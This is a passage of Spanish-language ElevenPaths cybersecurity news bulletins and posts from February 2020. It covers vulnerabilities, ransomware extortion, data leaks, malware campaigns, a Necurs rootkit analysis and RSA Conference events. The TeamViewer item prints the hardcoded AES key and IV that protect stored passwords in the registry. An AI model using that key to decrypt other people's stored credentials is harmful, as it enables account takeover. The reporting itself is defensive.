Escaneos para una vulnerabilidad RCE en Microsoft Exchange Investigadores de Zero Day Initiative han publicado los detalles sobre la vulnerabilidad CVE-2020-0688 CVSS 8.8, parcheada hace 14 días en el boletín de febrero. Esta vulnerabilidad permite a un atacante autenticado ejecutar código con privilegios de SYSTEM en una instalación de Microsoft Exchange on premise. Tan solo horas después de publicarse los detalles sobre la vulnerabilidad, investigadores como Kevin Beaumont o el equipo de Bad Packets han reportado la detección de actividad a gran escala de intentos de explotación de la vulnerabilidad. Al exigir acceso autenticado, es de esperar que esta actividad esté relacionada con acciones de robo de credenciales y ataques de fuerza bruta. Más información: https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys Kr00k: vulnerabilidad que permite a los atacantes descifrar paquetes WiFi Investigadores de seguridad de ESET han presentado en la conferencia de seguridad RSA 2020 detalles sobre Kr00k (CVE-2019-15126), una vulnerabilidad que afecta a las comunicaciones WiFi y que permitiría a un atacante interceptar y descifrar tráfico de una red WiFi. Según ESET, Kr00k afectaría a todos los dispositivos con capacidad WiFi que ejecutan chips Wi-Fi Broadcom y Cypress en conexiones WiFi que usen los protocolos de seguridad WPA2-Personal o WPA2-Enterprise WiFi, con cifrado AES-CCMP. Sin embargo, esta vulnerabilidad no conduce a un compromiso total de las comunicaciones de un usuario. El error puede ser explotado para romper el cifrado utilizado para proteger el canal WiFi, pero si las comunicaciones originales del usuario también estuvieran cifradas, como en el acceso a sitios web a través de HTTPS, Tor o clientes de MI cifrados, esas comunicaciones seguirían cifradas incluso después de un ataque de Kr00k. Los parches para esta vulnerabilidad ya deberían estar disponibles puesto que ESET ha trabajado durante los últimos meses en una divulgación responsable de la vulnerabilidad. Todos los detalles: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/107813_ESET_Kr00k.pdf Sodinokibi amenaza con nuevas técnicas de extorsión Los gestores del ransomware Sodinokibi, también conocido como REvil, han hecho pública la decisión de crear un blog donde compartir archivos robados a sus víctimas que no hayan realizado el pago del rescate exigido. Desde hace dos meses, los operadores de este ransomware venían publicando datos de sus víctimas en un foro ruso. Sin embargo, en su última publicación han anunciado la creación específica de este blog, animando a sus afiliados a copiar los datos de las víctimas de manera previa al cifrado de los equipos. Además, han anunciado su intención de compartir previamente la información en servicios de venta, así como sugieren otras formas de extorsión como el envío automático de correos electrónicos a las bolsas de valores para informar sobre el ataque de una compañía dañando de esta forma sus acciones. Con este anuncio, se espera por tanto que la tendencia iniciada por los operadores de Maze de publicar datos de sus víctimas siga al alza. Más info aquí: https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/ Decathlon España sufre una fuga de información Investigadores de seguridad de vpnMentor han descubierto una base de datos expuesta en un servidor ElasticSearch perteneciente a Decathlon España con datos de tiendas, empleados y usuarios de la compañía. La filtración contiene más de 123 millones de registros, que ocupan 9 GB, y que pertenecen a Decathlon España, aunque existe una alta posibilidad de que también incluya datos de Decathlon Reino Unido. Entre la información filtrada se encuentran usuarios y contraseñas de empleados sin cifrar, números de la Seguridad Social, teléfonos móviles, direcciones, periodos de contratación y correos de clientes, entre otros. Esta fuga de información podría dar lugar a ataques de phishing o robo de identidad entre otros. Toda la información: https://www.vpnmentor.com/blog/report-decathlon-leak/ Bretagne Télécom infectada por DoppelPaymer a través de la explotación de servidores Citrix vulnerables El proveedor de servicios de cloud francés Bretagne Télécom ha confirmado haber sido víctima del ransomware DoppelPaymer, habiéndose conseguido la infección mediante la explotación de la vulnerabilidad CVE-2019-19781 en Citrix ADC. Según ha confirmado el CEO de la empresa, Nicolas Boittin, los servidores eran vulnerables a los ataques ya que en el momento que comenzaron los escaneos de servidores vulnerables el ocho de enero, desde Citrix no se había publicado una solución al problema; dicha solución que se demoró hasta el 24 de enero. Una vez comprometidos los sistemas de Bretagne Télécom, los operadores de DoppelPaymer consiguieron cifrar 148 equipos con datos de cerca de una treintena de pequeños clientes. En cuanto a la afectación real, en este caso la compañía disponía de una copia de seguridad de todos los datos de los clientes por lo que se pudo volver a la normalidad sin necesidad de formalizar los pagos demandados. Como parte de la nueva tendencia observada recientemente, al no realizar el pago, los operadores del ransomware han procedido a publicar algunos documentos como ejemplo de la información que fue secuestrada en su blog durante este fin de semana, junto con información de otras tres empresas también infectadas. Más info: https://www.bleepingcomputer.com/news/security/doppelpaymer-hacked-bretagne-t-l-com-using-the-citrix-adc-flaw/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
28 de febrero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 17-21 de febrero
Fox Kitten: Campaña iraní contra servidores VPN El equipo de investigadores de ClearSky ha descubierto una campaña iraní contra docenas de empresas y organizaciones en todo el mundo a la que han llamado Fox Kitten y que se habría desarrollado durante el último trimestre de 2019. Según el informe publicado, el agente amenaza respaldado por el gobierno iraní habría priorizado la explotación de vulnerabilidades VPN de software como Pulse Secure, Palo Alto, Fortinet y Citrix tan pronto como se hicieron públicas para infiltrarse e introducir puertas traseras en empresas de todo el mundo. A lo largo de esta campaña, los atacantes lograron acceder y ganar persistencia en la red de numerosas empresas y organizaciones del sector de la informática, telecomunicaciones, petróleo y gas, aviación, gobierno y seguridad. En el análisis de esta campaña se ha encontrado relación entre la infraestructura utilizada en esta campaña y la actividad de los grupos iraníes APT34, APT33 y APT30. Toda la información aquí: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/106881_ClearSky-Fox-Kitten-Campaign-v1.pdf Campaña de distribución de Emotet vía SMS Investigadores de IBM X-Force han descubierto una campaña de distribución de Emotet mediante mensajes SMS. Dichos mensajes habrían sido enviados, aparentemente, desde números estadounidenses a teléfonos móviles haciéndose pasar por bancos reconocidos y alertando a los usuarios sobre una cuenta bloqueada. Estos SMS contienen además un enlace a la supuesta página del banco. Los usuarios que acceden al enlace son redirigidos al dominio shabon[.]co, que ha sido reportado en las últimas semanas por distribuir el malware Emotet. La víctima vería una página de phishing que imita la versión móvil de la página web del banco registrada el mismo día por los atacantes. El dominio incluye el nombre del banco modificando el TLD y está diseñado para obtener las credenciales de la víctima. Más información: https://securityintelligence.com/posts/emotet-smishing-uses-fake-bank-domains-in-targeted-attacks-payloads-hint-at-trickbot-connection/ Intento de extorsión a usuarios de Google AdSense Se ha descubierto lo que podría tratarse de un nuevo esquema de extorsión basado en un mensaje enviado por correo electrónico dirigido a los propietarios de sitios web que muestran anuncios publicitarios a través del programa AdSense de Google. En este fraude, los estafadores estarían demandando bitcoins a cambio de una promesa de no inundar los anuncios del editor con “tráfico basura” de bots que provocaría que los sistemas antifraude automatizados de Google suspendieran la cuenta de AdSense del usuario por tráfico sospechoso. Respecto a este mensaje, Google ha indicado que parece ser una amenaza clásica de sabotaje en la que un actor intenta desencadenar una acción contra el publicista enviando tráfico no válido a su historial. Google ha comentado además que tiene amplias herramientas y procesos para proteger contra el tráfico no legítimo en todos sus productos, y que la mayoría del tráfico no válido se filtra en sus sistemas antes de que los anunciantes y editores se vean afectados. Noticia completa aquí: https://krebsonsecurity.com/2020/02/pay-up-or-well-make-google-ban-your-ads/ Nueva campaña del troyano AZORult suplantando a ProtonVPN Un equipo de investigadores ha descubierto una nueva campaña del troyano AZORult que se distribuye a través de un instalador falso de ProtonVPN. Esta amenaza estaría activa desde el pasado mes de noviembre, momento en que el actor malicioso registró el dominio protonvpn[.]store. Se ha informado de que uno de los vectores de ataque se realiza mediante malvertising, el cual redirige a un sitio web malicioso mediante un banner. En esta página se realiza una descarga de un instalador falso de ProtonVPN para Windows. El objetivo de este malware es robar criptomonedas de monederos que se encuentran guardados en local, obtener información de inicios de sesión FTP y contraseñas FileZilla. Asimismo, AZORult exfiltra credenciales de correo electrónico e información de los navegadores instalados en el dispositivo. Toda la información: https://securelist.com/azorult-spreads-as-a-fake-protonvpn-installer/96261/ Corregidas 17 vulnerabilidades de productos Cisco Cisco ha lanzado actualizaciones de seguridad para abordar 17 vulnerabilidades que afectaban a sus líneas de productos de redes y comunicaciones unificadas. Los fallos corregidos permitían el acceso remoto y ejecución de código, elevación del privilegio, denegación de servicio y falsificaciones de solicitudes en varios sitios. De estas vulnerabilidades, una era crítica, seis se clasificaron como de gravedad alta y el resto con gravedad media. La vulnerabilidad crítica, CVE-2020-3158, tiene que ver con la presencia de una cuenta de sistema que tiene una contraseña predeterminada y estática en la herramienta Smart Software Manager, pudiendo un atacante explotar la vulnerabilidad al usar esta cuenta predeterminada para conectarse a un sistema vulnerable y obtener acceso de lectura y escritura a los datos del sistema. La vulnerabilidad afectaría a las versiones de Cisco Smart Software Manager On-Prem anteriores a la versión 7-202001, pero únicamente si la función Alta disponibilidad (HA) está habilitada (HA no está por defecto habilitada). Más: https://tools.cisco.com/security/center/publicationListing.x Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
21 de febrero de 2020
ElevenPaths en la RSA Conference 2020, el evento referencia en ciberseguridad
Un año más, volvemos a la RSA Conference, el evento referencia del sector de la ciberseguridad. Del 24 al 27 de febrero estaremos presentando nuestra propuesta bajo el lema Humanizing Security, humanizando la seguridad. Tres días llenos de actividades, reuniones, presentación de demos y proyectos de diferentes start ups apoyadas por Wayra y empresas participadas por Telefónica. Las diferentes actividades se llevarán a cabo en nuestro estand, el Booth South #1459 del Moscone Center de San Francisco. Te contamos qué vas a poder encontrar: Demos de nuestras herramientas Desde el Área de Innovación y Laboratorio , junto con el área de Seguridad IoT, se trabaja para desarrollar nuevas herramientas de seguridad que se adapten a las nuevas tendencias tecnológicas y permitan utilizar la tecnología de manera segura. Las demos que presentaremos durante la RSA Conference son las siguientes: IdoT: esta propuesta proporciona a los dispositivos de IoT una identidad única. Esta robusta identidad permite garantizar el envío de la información generada por el dispositivo de forma segura, utilizando una encriptación de extremo a extremo con un certificado propio emitido por Telefónica. La información enviada se podrá publicar cifrada en Blockchain para que pueda ser auditada. TheTHE: debido a la experencia de nuestros equipos de Threat Hunting, el equipo de Innovación y Laboratorio ha desarrollado un framework OpenSource gratuito alojado en Github pensado en facilitar las primeras fases de investigación. IoT Anomaly Detection: esta demostración permite monitorizar en tiempo real ataques dirigidos a dispositivos IoT, especialmente ataques de fuerza bruta. La información del ataque llega automáticamente a la plataforma IoT Threat Detection, permitiendo detectar el ataque y levantar una alerta con detalles del mismo. Aldara: se trata de una de las herramientas principales de VERO, un servicio de inteligencia que nos ha permitido analizar el comportamiento y avance del Coronavirus en redes sociales. Presentaremos conclusiones, cifras y principales comunidades creadas en torno al virus en el mundo digital. Start ups de seguridad y Wayra Durante la jornada del martes disfrutaremos de la visita en nuestro estand de varias start ups de seguridad que presentarán sus propuestas de la mano de Wayra. Descubre sus innovadoras soluciones de 11:00 a 13:00 del martes 25 de febrero: LuJam: LuJam Cyber fue fundada en 2014 cuando Tim Moran se dio cuenta de que las pequeñas y medianas empresas necesitaban niveles de ciberseguridad similares a los que disfrutaban las grandes empresas, pero ofrecidos de una manera que fuera fácil de usar para el propietario o el gerente de un negocio, sin tener que ser un especialista en tecnología de la información. 11.00 - 11:15 AM Fraud.net: Fraud.net opera una plataforma de detección y análisis de fraudes en tiempo real, ayudando a las compañías de pagos digitales a identificar rápidamente las anomalías en las transacciones y a localizar el fraude utilizando grandes datos y visualizaciones en vivo. 11:15 - 11:30 AM Keybox: Keybox es una bóveda de datos distribuida que permite el más alto nivel de seguridad de los datos mediante la fragmentación y el almacenamiento distribuido. Keybox almacena fragmentos seguros de información de datos cifrados en múltiples nodos, y contratos inteligentes para recombinar los datos cuando sea necesario. 11:30 - 11:45 AM Ohalo: Ohalo es una empresa de software empresarial centrada en la privacidad de datos. Sus herramientas automatizan los procesos de cumplimiento de la privacidad de los datos, como el mapeo de datos y la respuesta a las solicitudes de los sujetos de los datos, para un mejor y más eficiente gobierno de los datos. 11:45 - 12:00 PM Pixel Pin: PixelPin fue fundada en 2012 por Brian Taylor y Geoff Anderson. Los dos cofundadores vieron una oportunidad de mercado para mejorar los métodos de autenticación, el producto fue iterado a partir del feedback de sus clientes durante los primeros años y salió al aire en 2016. En 2018 PixelPin obtuvo su primera financiación de capital de riesgo de SBI (formalmente SoftBank Investments) en Japón. 12:00 - 12:15 PM Secure Schools: empresa experta en seguridad de la información con la educación en su ADN. Paul Alberry (experto en seguridad de la información) y Jill Foster (experta en educación; ex directora y directora general de una fundación multiacadémica) fundaron la compañía tras haber trabajado juntos en escuelas durante ocho años en proyectos técnicos. 12:15 - 12:30 PM The Cyberfish Company: la compañía CyberFish ofrece soluciones que gestionan la exposición de la organización al riesgo digital resultante del comportamiento humano. Sus investigación han demostrado tener una influencia directa e indirecta en el riesgo de seguridad y en la resistencia de las organizaciones. Se utiliza con clientes para iniciativas de reclutamiento, desarrollo y educación. 12:30 - 12:45 PM TrustStamp: Trust Stamp es una empresa de ciberseguridad de cuatro años de antigüedad con sede en Estados Unidos y el Reino Unido. Su objetivo es crear valor a largo plazo para los accionistas inventando, patentando y ofreciendo soluciones éticas basadas en la inteligencia artificial que aborden la confianza y la identidad, al tiempo que potencien la seguridad personal y de las transacciones, la privacidad de los datos y la integridad. 12:45 - 13:00 PM Agenda ElevenPaths martes 25 RSA Conference Ponencias de nuestros expertos La jornada del miércoles será turno para nuestros expertos. A través de diferentes ponencias protagonizadas por el equipo de seguridad de ElevenPaths presentaremos contenidos propios, os dejamos el orden y temáticas de las ponencias, así como los ponentes: Humanizing Security: There when you need us, por Emma O'Nien y Paulo López. 11:00 - 11:15 AM IoT & OT, Vicente Segura. 11:15 - 11:30 AM Coronavirus: Health and beyond, por Helene Aguirre. 11:30 - 11:45 AM Open Cloud Factory, por Ester Tejedor y Darragh Kelly. 1:00 - 1:15 PM Intelligence & Innovation, por Claudio Caracciolo. 1:15 - 1:30 PM Innovative Technologies, por Claudio Caracciolo. 1:30 - 1:45 PM Cloud Security, por David Martín Lindstrom. 3:00 - 3:15 PM SOC of the future architecture, por Alexandre Gaspar. 3:15 - 3:30 PM MDR & MSSP, por Alberto Cuesta. 3:30 - 3:45 PM Agenda ElevenPaths miércoles 26 RSA Conference Empresas invitadas La jornada del jueves contaremos con la presencia de varias empresas participadas por Telefónica que participan en la RSA Conference y se acercarán a compartir experiencias y crear sinergias en nuestro estand: BlueLiv: Blueliv es el principal proveedor de inteligencia sobre ciberamenazas de Europa, con sede en Barcelona. Centrados más allá del perímetro, recorriendo la red abierta, profunda y oscura para ofrecer una inteligencia sobre amenazas automatizada y procesable para proteger la empresa y gestionar su riesgo digital. 11:00 - 11:15 AM Hdiv: Hdiv Security es un proveedor líder de software de seguridad para aplicaciones autoprotegidas en tiempo real, siendo la primera empresa del mundo en ofrecer protección contra los errores de seguridad y las fallas de diseño de SDLC. Desde 2008, son pioneros en software de autoprotección y hoy en día, Hdiv se integra con los principales proveedores de software comercial como Spring y Grails. 11:30 - 11:45 AM Agenda ElevenPaths jueves 27 RSA Conference Si vas a estar en San Francisco, te esperamos en la RSA Conference. Recuerda que puedes usar nuestro código de acceso Expo Code (XE0UTELEF) para poder registrarte y acceder a la conferencia. Si quieres seguir las actividades mencionadas síguenos a traves de nuestras cuentas de Twitter y LinkedIn.
21 de febrero de 2020
La Alianza Global de Seguridad refuerza sus capacidades con la compartición de inteligencia de amenazas
Dallas, Singapur, Madrid, 18 de febrero 2020 – La Alianza Global de Seguridad entre operadoras ha anunciado hoy nuevos esfuerzos de colaboración con el objetivo de mejorar aún más la capacidad de detectar y eliminar las amenazas del entorno de los clientes. Tres de los miembros de la alianza ‒AT&T, Singtel y Telefónica‒ trabajan juntos compartiendo continuamente la última información sobre amenazas e indicadores de compromiso (IoC) relacionados con las amenazas a la ciberseguridad y las campañas de ataque global para poder ayudar a las organizaciones a mantenerse fuertes ante un entorno de amenazas en constante cambio. Se trata de la primera colaboración de este tipo entre las áreas de seguridad de operadoras de telecomunicaciones. La inteligencia de amenazas de la Alianza Global de Seguridad procede de múltiples fuentes, incluyendo datos anonimizados de los centros de operaciones de seguridad e investigaciones de seguridad de los miembros de la alianza. Al reunir información valiosa sobre nuevas campañas de software malintencionado e IoC de los ataques en curso, los clientes de las operadoras obtienen una visión más global y completa de los avances en materia de ciberseguridad que pueden afectar a sus operaciones. El intercambio de inteligencia sobre amenazas permitirá a los analistas de seguridad de las operadoras miembro de la alianza tomar medidas más proactivas para combatir actividades maliciosas. Para lograrlo, se están escribiendo y trasfiriendo las firmas asociadas a las nuevas campañas descubiertas de phishing y malware, a los productos/entornos de los clientes hasta sus endpoints. Las diferentes fuentes que sirven a los instrumentos de inteligencia sobre amenazas utilizarán la plataforma de AT&T Alien Labs® Open Threat Exchange® (OTX™). La Alianza Global de Seguridad, formada por AT&T, Etisalat, Singtel, SoftBank y Telefónica, es la primera alianza de seguridad global entre operadoras de telecomunicaciones. La alianza tiene por objeto mejorar la capacidad de cada miembro para responder rápidamente a las amenazas de ciberseguridad. Su objetivo es ayudar a las empresas y a los organismos gubernamentales a hacer frente a la creciente amenaza de los ciberataques en un entorno en constante evolución. AT&T, Singtel y Telefónica son los primeros miembros de la Alianza Global de Seguridad en participar en la iniciativa de intercambio de inteligencia sobre amenazas, iniciativa que se ampliará a otros miembros próximamente. Citas de miembros de la Alianza Global de Seguridad: «El acceso a la información sobre amenazas procesables a nivel mundial se ha vuelto cada vez más indispensable a medida que las amenazas cibernéticas cruzan las fronteras de la soberanía nacional», afirma Chng Tien San, director global de Alianzas de Trustwave, una empresa de Singtel. «Trustwave ayuda a las empresas a realizar una continua detección de amenazas y respuesta, y esperamos seguir colaborando con la Alianza Global de Seguridad dado que ayudamos colectivamente a las empresas a adoptar la transformación digital de forma segura.» «Nuestros clientes nos exigen que entreguemos información contextualizada sobre las amenazas, con tantos detalles como sea posible para revelar los ataques no detectados. Aprovechar los IoC más relevantes de los miembros de la Alianza en una sola plataforma nos permitirá mejorar nuestra detección y respuesta, y los nuevos playbooks creados permitirán a nuestros analistas centrarse en el análisis e investigación de las técnicas avanzadas para acabar con las amenazas», declara Sebastián García de Saint-Léger, Gerente responsable de relación con Telcos de ElevenPaths. «Esta colaboración refuerza la lucha global contra el cibercrimen», afirma Jaime Blasco, AVP de desarrollo de productos para la ciberseguridad de AT&T. «Esta iniciativa ya ha demostrado ser útil para la visibilidad de AT&T en las amenazas actuales y, mientras continuamos trabajando juntos, nuestro enfoque es utilizar esta iniciativa para ofrecer una mejor inteligencia sobre amenazas a nuestros clientes.»
18 de febrero de 2020
APTualizador (II): deconstruyendo el rootkit Necurs y herramientas para detectarlo y eliminarlo
Este informe ha sido realizado por Roberto Santos y Javier Rascón del equipo de investigadores del CSIRT-SCC (Security Cyberoperations Center) con la colaboración de ElevenPaths. A finales de junio de 2019, una importante empresa española sufrió un ataque que afectó a miles de sus equipos. Fue tal la magnitud del ataque que nos motivó a comenzar esta investigación, de la que ya escribimos el artículo APTualizador (I) en julio de 2019. En aquel momento nos llamó la atención que en un primer análisis rápido observamos que la muestra descargaba la actualización de seguridad legítima de Windows KB3033929, aunque lo hacía desde un servidor no oficial. En otras palabras: instalaba el archivo legítimo (firmado por Microsoft) desde un servidor no oficial. En este segundo informe nos centraremos en los aspectos técnicos del rootkit encontrado. Como resultado de la investigación identificamos este rootkit como una evolución de Necurs. Esta botnet aparecida en 2012 es una de las más persistentes y grandes del mundo y se estima que está formada por 6 millones de equipos zombi, ordenadores de víctimas repartidos por todo el mundo y que controlan los atacantes de manera remota. En este informe se estudiará a fondo y desde una perspectiva técnica cómo el malware logra ocultarse en el equipo, analizando las herramientas utilizadas y el código que controla este comportamiento. Por otro lado, también se analiza el protocolo de comunicación utilizado, que ha sido modificado desde las primeras versiones y en el que se dejan de utilizar comandos IOCTL. En vez de esto, ahora se basa en lecturas/escrituras sobre el registro de Windows, convirtiendo el registro en un covert channel local. Nuestra investigación finaliza con la publicación de dos herramientas, NeCure y NeCsists, que permiten detectar la presencia del malware y desinfectar la máquina. Estas herramientas han sido desarrolladas tras encontrar la manera de abusar de las técnicas utilizadas por los propios atacantes, gracias al estudio y el análisis mediante técnicas de ingeniería inversa. En este informe hemos contribuido a actualizar el estado del arte sobre la evolución de uno de los rootkits más sofisticados hasta la fecha. Conclusiones y hallazgos Se ha extraído una lista actualizada de todos los comandos funcionales que el rootkit puede recibir. Hasta ahora sólo se conocía un número muy reducido de ellos y, si existían listas completas, no estaban actualizadas. Hemos podido desarrollar herramientas que permiten su detección y desinfección. Además, ponemos a disposición pública tanto el presente análisis como su código fuente. Demostramos como Necurs ha evolucionado a un modelo de negocio del tipo Malware as a Service que sirve como punto de entrada de otro malware y ofrece este servicio a otros actores. Solo así se explica la existencia de las claves que establecían una fecha límite y un número de ejecuciones máximas del malware. Gracias a la comparación entre las blacklists (lista de procesos contra los que se protege el rootkit) de versiones anteriores y las modernas, se extrae un trabajo activo de investigación por parte de los atacantes sobre el estado del arte de las soluciones antimalware.
17 de febrero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 10-14 de febrero
Boletín de Microsoft Microsoft ha publicado su boletín mensual de actualizaciones de seguridad, cubriendo en esta ocasión hasta 99 fallos de los cuales 12 se consideran críticos y 87 importantes. De entre las vulnerabilidades detectadas, cinco ya se conocían y una de ellas estaría siendo explotada actualmente por agentes maliciosos. Dicha vulnerabilidad sería la CVE-2020-0674, fallo de corrupción de memoria en el motor de scripting que afecta a Internet Explorer y que ya se dio a conocer el pasado 17 de enero. Este fallo permite la ejecución de código si el atacante logra que el usuario entre en una web especialmente manipulada, pero también puede ejecutarse a través de objetos incrustados en documentos de Office. Adicionalmente, se recomienda poner especial atención a los siguientes fallos: CVE-2020-0688: Corrupción de memoria en Microsoft Exchange que permite la ejecución de código a través del envío de un email malicioso. No requiere interacción con el usuario y podría implicar que el atacante logre hacerse con el control de Microsoft Exchange con una acción simple. CVE-2020-0729: Ejecución de código LNK en remoto que puede causar que un sistema procese un archivo .LNK malicioso. Para ello, el atacante necesita que el usuario abra una conexión remota o que inserte un dispositivo USB con el archivo comprometido. CVE-2020-0689: Vulnerabilidad que permite evadir el Secure Boot de Microsoft para cargar software malicioso en un sistema. Se trata de uno de los fallos dados a conocer de forma previa a la publicación del boletín. Adicionalmente, se recomienda tomar medidas para parchear la vulnerabilidad de ejecución remota de código CVE-2020-0738. Más información aquí: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Feb La CIA fue propietaria de la mayor empresa mundial de cifrado Una investigación llevada a cabo por The Washington Post y la televisión alemana ZDF ha sacado a la luz uno de los mayores secretos de la CIA (Central Intelligence Agency), al descubrir que ésta fue propietaria de la mayor compañía de cifrado a nivel mundial, denominada Crypto AG (o “Minerva”, por su nombre en clave). Este hecho permitió a la agencia de inteligencia tener acceso a las comunicaciones descifradas de más de 120 países del mundo, como España, el Vaticano o Irán. Durante más de 50 años, la CIA ha tenido el control de las comunicaciones secretas de diplomáticos, espías y soldados, a costa de vender mediante Cryto AG máquinas de cifrado con puertas traseras tanto a aliados como a adversarios. Lo que comenzó como un acuerdo entre el fundador de la compañía, Boris Hagelin, y William F. Friedman, miembro de la NSA, pasó en la década de los 70 a formalizarse mediante la adquisición de la compañía por parte de la CIA y de la Inteligencia de Alemania Occidental (BND), en una operación denominada como “Thesaurus” y posteriormente como “Rubicon”. Crypto AG pasó a ser en 1994 propiedad exclusiva de la CIA hasta el año 2018, en el que la empresa fue disuelta para formar dos nuevas entidades (Crypto International & CyOne Security). Información completa: https://www.washingtonpost.com/gdpr-consent/?next_url=https%3a%2f%2fwww.washingtonpost.com%2fgraphics%2f2020%2fworld%2fnational-security%2fcia-crypto-encryption-machines-espionage%2f Estados Unidos acusa a Huawei de instalar puertas traseras para espiar Funcionarios estadounidenses han afirmado tener pruebas de que la compañía china Huawei tiene la capacidad de acceder a redes de teléfonos móviles en todo el mundo. En una primicia publicada en The Wall Street Journal, el medio explica cómo supuestamente Huawei ha instalado puertas traseras, también conocidas como interfaces de interceptación legal, y hace uso de estas para acceder a cualquier información que se transmite en el teléfono. Este sistema es utilizado por las fuerzas de seguridad y requiere de órdenes de acceso para ello, si bien, no se excluye que no pueda ser utilizado por los proveedores de equipos, dada la privación de libertad que supone. Por el momento, el gobierno de los Estados Unidos está intentando persuadir a sus aliados de que limiten los equipos de Huawei de sus redes, un hecho que aviva la encrucijada en la que se encuentra este país con China desde hace años. Toda la información aquí: https://www.wsj.com/articles/u-s-officials-say-huawei-can-covertly-access-telecom-networks-11581452256 Emotet busca expandirse a redes Wi-Fi cercanas Investigadores de Binary Defense han descubierto un nuevo módulo de Emotet que permitiría propagar el malware a nuevas víctimas conectadas a redes Wi-Fi inseguras cercanas a un dispositivo infectado. Esta nueva variante de Emotet iniciaría el proceso de propagación utilizando la interfaz wlanAPI en el equipo infectado para descubrir redes inalámbricas cercanas e intentaría acceder por fuerza bruta si están protegidas por contraseña. Una vez conectado el dispositivo infectado a otra red inalámbrica, el gusano comenzaría a buscar otros dispositivos en la red con recursos compartidos no ocultos. A continuación, buscaría todas las cuentas de esos dispositivos e intentaría forzar la contraseña de administrador y de todos los demás usuarios que pueda recuperar. Más aquí: https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/ Descubierto posible vector de ataques SWIFT Investigadores de seguridad de F-Secure han publicado un artículo en el que se explica, a modo de prueba, un mecanismo para vulnerar mensajes SWIFT MT103 clasificados como transferencia de crédito a favor de cliente único. La prueba de concepto consistía en realizar una instrucción de pago. Para ello, se necesitaría inyectar este mensaje y conseguir que pase las reglas de validación del entorno y de SWIFTNet, así como controles de AML. Oliver Simonnet señala que, tras investigar la red SWIFT y su funcionamiento, concluyó que para poder realizarlo tendría que aprovechar el acceso de un administrador al sistema de gestión Message Queue y vulnerar la relación de confianza entre los sistemas SYS, MID y SAA, de forma que podría introducir un mensaje de paso en la cola de salida de SYS. Vulnerar este mecanismo podría ser aprovechable por un agente amenaza para poder realizar transferencias millonarias de una cuenta a otra, comúnmente conocido como ataque SWIFT. El investigador ha destacado que en ningún momento se explotó una vulnerabilidad como tal de los sistemas, si no que este sistema podría ser utilizado si se roba el acceso del usuario administrador, por lo que recomienda que estas credenciales se protejan con altos niveles de seguridad. Más información: https://labs.f-secure.com/blog/forging-swift-mt-payment-messages Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
14 de febrero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 3-7 de febrero
TeamViewer almacena la contraseña de usuario en el registro de Windows Un investigador de seguridad ha descubierto que TeamViewer estaría almacenando las contraseñas de inicio de sesión de los usuarios, que no las claves de control remoto generadas en cada conexión, cifradas con AES-128-CBC con la clave 0602000000a400005253413100040000 y con iv (vector de inicialización presente en funciones hash criptográficas) 0100010067244F436E6762F25EA8D704 en el registro de Windows. Al reutilizarse una misma contraseña, se facilita un escenario de escalada de privilegios y un atacante podría llegar a usar TeamViewer para conectarse de forma remota a una máquina objetivo. Además, el software permite copiar datos o programar tareas para ejecutarlas a través de su servicio, que se ejecuta como NT AUTHORITY/SYSTEM, por lo que un usuario con un nivel de privilegios bajo podría obtener estos permisos. Ante la alerta generada, desde TeamViewer emitieron un comunicado tratando de quitar importancia al asunto aduciendo que es necesario el acceso previo al equipo para poder ver el registro de Windows, si bien son muchos los usuarios que indican no se habría realizado una correcta valoración del riesgo por parte de la firma. El CCN CERT emitió un aviso al conocerse la noticia desaconsejando el uso de la aplicación, si bien un día más tarde ha emitido una actualización limitando también el impacto. Información completa aquí: https://whynotsecurity.com/blog/teamviewer/ Técnica de inyección de código para explotar vulnerabilidad en SharePoint Microsoft lanzó en enero un parche para corregir la vulnerabilidad CVE-2020-0646, cuya explotación permitiría la ejecución remota de código en SharePoint Online. Si bien el problema principal fue corregido en .NET Framework, las versiones locales de SharePoint que no disponen del parche aún serían vulnerables a día de hoy. El investigador de ciberseguridad Soroush Dalili, ha publicado una investigación en la que indica que explotando esta vulnerabilidad se podría abusar de algunos de los parámetros del System.Workflow.Activities con el objetivo de ejecutar código en el servidor de SharePoint al compilar un archivo de formato XOML. La vulnerabilidad fue puesta en conocimiento de Microsoft en noviembre de 2019, que procedió a parchearla inmediatamente en la plataforma online. Sin embargo, como se ha indicado con anterioridad, no fue hasta el pasado mes de enero cuando el problema principal se corregiría. Más información: https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/ Twitter corrige problema en API explotada para obtener información de usuarios Twitter ha reconocido que el pasado diciembre se descubrió que alguien estaba usando una gran red de cuentas falsas para explotar su API y relacionar nombres de usuario con sus números de teléfono. Aunque las cuentas maliciosas se encontraban en países de todo el mundo, una gran cantidad de solicitudes a la API afectada provenían de direcciones IP de Irán, Israel y Malasia. Según Twitter, el endpoint de la API que fue objeto de este ataque permitía a las personas que creaban nuevas cuentas encontrar a sus amigos en Twitter, permitiendo consultar a aquellos usuarios que tenían el número de teléfono asociado con sus cuentas y que también habían habilitado la opción 'Permitir que las personas que tienen su número de teléfono lo encuentren en Twitter' en su configuración. Inmediatamente tras la investigación, Twitter realizó una serie de cambios en el endpoint afectado para que ya no 